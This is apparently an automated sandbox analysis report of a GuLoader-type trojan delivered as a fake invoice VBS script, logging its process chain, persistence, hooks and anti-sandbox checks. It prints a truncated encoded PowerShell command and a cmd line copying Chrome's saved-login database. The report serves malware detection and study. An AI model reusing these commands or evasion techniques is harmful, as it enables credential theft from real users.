Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220510

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Hetero3.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@22/16@21/8

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"

Source: C:\Windows\SysWOW64\chkdsk.exe

File written: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 27_2_0300E359 push F6D28566h; ret	27_2_0300E35E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0070E287 push B364374Eh; iretd	32_2_0070E2E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071D4F2 push eax; ret	32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071D4FB push eax; ret	32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071D4A5 push eax; ret	32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071D55C push eax; ret	32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_0071E90F push esp; ret	32_2_0071E916
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 32_2_00717B37 push cs; ret	32_2_00717B39

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll

Jump to dropped file

Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72ACD4 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,		37_2_00000265BE72ACD4
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 37_2_00000265BE72ACE2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,		37_2_00000265BE72ACE2

Source: C:\Windows\SysWOW64\chkdsk.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000000D.00000002.1827582249.0000000009B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLPROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Source: C:\Windows\explorer.exe TID: 3136	Thread sleep time: -234000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4528	Thread sleep time: -176000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
